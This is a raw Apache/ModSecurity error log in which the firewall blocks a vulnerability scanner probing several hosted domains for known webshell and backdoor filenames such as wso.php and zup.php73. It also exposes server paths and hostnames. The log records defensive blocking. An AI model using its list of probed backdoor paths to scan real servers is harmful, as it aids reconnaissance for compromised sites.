[Tue May 26 19:37:45.542408 2026] [security2:error] [pid 70836:tid 70921] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/bless.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxFAAA8VQ"]
[Tue May 26 19:37:45.604429 2026] [security2:error] [pid 70836:tid 70953] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wpc.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxFQAA1XQ"]
[Tue May 26 19:37:45.611210 2026] [security2:error] [pid 70836:tid 70927] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/class-t.api.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxFgAA2lo"]
[Tue May 26 19:37:45.617613 2026] [security2:error] [pid 70836:tid 70935] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/sagax1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxFwAAlmI"]
[Tue May 26 19:37:45.680702 2026] [security2:error] [pid 70836:tid 70936] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/fone1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxGAAAvWM"]
[Tue May 26 19:37:45.685647 2026] [security2:error] [pid 70836:tid 70937] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/w.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxGQAAoGQ"]
[Tue May 26 19:37:45.696077 2026] [security2:error] [pid 70836:tid 70940] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wpc.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxGgAA_mc"]
[Tue May 26 19:37:45.756964 2026] [security2:error] [pid 70836:tid 70946] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ncx.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxJAAAmW0"]
[Tue May 26 19:37:45.760968 2026] [security2:error] [pid 70836:tid 70949] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/archive.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxJQAAlHA"]
[Tue May 26 19:37:45.771322 2026] [security2:error] [pid 70836:tid 70948] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/fone1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxJwAApW8"]
[Tue May 26 19:37:45.835271 2026] [security2:error] [pid 70836:tid 70867] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxTwAA3x4"]
[Tue May 26 19:37:45.836429 2026] [security2:error] [pid 70836:tid 70857] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/bless.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxUAAAtBQ"]
[Tue May 26 19:37:45.846633 2026] [security2:error] [pid 70836:tid 70875] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ncx.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxUQAA9SY"]
[Tue May 26 19:37:45.914370 2026] [security2:error] [pid 70836:tid 70872] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/sagax1.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxVQAAmCM"]
[Tue May 26 19:37:45.915601 2026] [security2:error] [pid 70836:tid 70871] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wso.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxUwAA-iI"]
[Tue May 26 19:37:45.922709 2026] [security2:error] [pid 70836:tid 70873] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxVwAA4CQ"]
[Tue May 26 19:37:45.990381 2026] [security2:error] [pid 70836:tid 70866] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wpc.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxWAAA8x0"]
[Tue May 26 19:37:45.994317 2026] [security2:error] [pid 70836:tid 70877] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/zup.php73"] [unique_id "ahWpMe_FvbQ_BhqVMRVxWQAArig"]
[Tue May 26 19:37:45.998592 2026] [security2:error] [pid 70836:tid 70956] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wso.php"] [unique_id "ahWpMe_FvbQ_BhqVMRVxWgAAk3c"]
[Tue May 26 19:37:46.066344 2026] [security2:error] [pid 70836:tid 70957] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/fone1.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxWwAAhXg"]
[Tue May 26 19:37:46.071535 2026] [security2:error] [pid 70836:tid 70876] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/k.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxXAAA8Cc"]
[Tue May 26 19:37:46.077380 2026] [security2:error] [pid 70836:tid 70874] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/zup.php73"] [unique_id "ahWpMu_FvbQ_BhqVMRVxXQAArCU"]
[Tue May 26 19:37:46.121722 2026] [security2:error] [pid 70836:tid 70884] [remote 74.7.241.58:60706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWpMu_FvbQ_BhqVMRVxXgAAjC8"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/jkjuice.com/wp-includes
[Tue May 26 19:37:46.142380 2026] [security2:error] [pid 70836:tid 70865] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ncx.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxYgAAjxw"]
[Tue May 26 19:37:46.148040 2026] [security2:error] [pid 70836:tid 70891] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-blink.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxYwAAyDY"]
[Tue May 26 19:37:46.152377 2026] [security2:error] [pid 70836:tid 70880] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/k.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxZAAAyys"]
[Tue May 26 19:37:46.219328 2026] [security2:error] [pid 70836:tid 70959] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxaAAA9Ho"]
[Tue May 26 19:37:46.225153 2026] [proxy:error] [pid 70836:tid 70960] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.225192 2026] [proxy_http:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.225767 2026] [proxy:error] [pid 70836:tid 70960] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.225803 2026] [proxy_http:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.226751 2026] [security2:error] [pid 70836:tid 70961] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-blink.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxagAAvHw"]
[Tue May 26 19:37:46.294941 2026] [security2:error] [pid 70836:tid 70890] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wso.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxbgABAjU"]
[Tue May 26 19:37:46.306144 2026] [proxy:error] [pid 70836:tid 70963] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.306188 2026] [proxy_http:error] [pid 70836:tid 70963] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.306788 2026] [proxy:error] [pid 70836:tid 70963] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.306821 2026] [proxy_http:error] [pid 70836:tid 70963] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.370170 2026] [security2:error] [pid 70836:tid 70879] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/zup.php73"] [unique_id "ahWpMu_FvbQ_BhqVMRVxegAAvio"]
[Tue May 26 19:37:46.385117 2026] [proxy:error] [pid 70836:tid 70895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.385189 2026] [proxy_http:error] [pid 70836:tid 70895] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.385896 2026] [proxy:error] [pid 70836:tid 70895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:46.385934 2026] [proxy_http:error] [pid 70836:tid 70895] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:46.445141 2026] [security2:error] [pid 70836:tid 70898] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/k.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxfQAAzD0"]
[Tue May 26 19:37:46.468014 2026] [security2:error] [pid 70836:tid 70901] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/ww5.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxfgAA3EA"]
[Tue May 26 19:37:46.520303 2026] [security2:error] [pid 70836:tid 70964] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-blink.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxgwAA6X8"]
[Tue May 26 19:37:46.545394 2026] [security2:error] [pid 70836:tid 70882] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/2.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxhAAA5C0"]
[Tue May 26 19:37:46.567617 2026] [security2:error] [pid 70836:tid 70886] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/ww5.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxhQAA4jE"]
[Tue May 26 19:37:46.622636 2026] [security2:error] [pid 70836:tid 70881] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxhgAAvSw"]
[Tue May 26 19:37:46.644737 2026] [security2:error] [pid 70836:tid 70900] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/2.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxhwAAoD8"]
[Tue May 26 19:37:46.720773 2026] [security2:error] [pid 70836:tid 70906] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxjAAAqUU"]
[Tue May 26 19:37:46.727295 2026] [security2:error] [pid 70836:tid 70907] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/atomlib.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxjQAAtUY"]
[Tue May 26 19:37:46.796526 2026] [security2:error] [pid 70836:tid 70889] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/atomlib.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxlQABATQ"]
[Tue May 26 19:37:46.804927 2026] [security2:error] [pid 70836:tid 70962] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/rip.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxlgAAuX0"]
[Tue May 26 19:37:46.873440 2026] [security2:error] [pid 70836:tid 70896] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/rip.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxmAAAqzs"]
[Tue May 26 19:37:46.881408 2026] [security2:error] [pid 70836:tid 70897] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/p.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxmQAAtDw"]
[Tue May 26 19:37:46.961667 2026] [security2:error] [pid 70836:tid 70902] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/php.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxmgAA9UE"]
[Tue May 26 19:37:46.961828 2026] [security2:error] [pid 70836:tid 70903] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/p.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxmwAAmkI"]
[Tue May 26 19:37:47.039393 2026] [security2:error] [pid 70836:tid 70904] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/php.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxogAAi0M"]
[Tue May 26 19:37:47.196675 2026] [security2:error] [pid 70836:tid 70998] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpMu_FvbQ_BhqVMRVxlAAAAKU"]
[Tue May 26 19:37:47.264045 2026] [security2:error] [pid 70836:tid 70928] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/ww5.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxpwAAxVs"]
[Tue May 26 19:37:47.376955 2026] [autoindex:error] [pid 70836:tid 71085] [client 192.36.109.131:41701] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:37:47.397659 2026] [security2:error] [pid 70836:tid 70930] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/2.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxrAAA2F0"]
[Tue May 26 19:37:47.476229 2026] [security2:error] [pid 70836:tid 70931] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-admin/classwithtostring.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxsAAAhV4"]
[Tue May 26 19:37:47.620682 2026] [security2:error] [pid 70836:tid 70934] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/atomlib.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxtwAAy2E"]
[Tue May 26 19:37:47.696636 2026] [security2:error] [pid 70836:tid 70941] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/rip.php"] [unique_id "ahWpM-_FvbQ_BhqVMRVxuAAAo2g"]
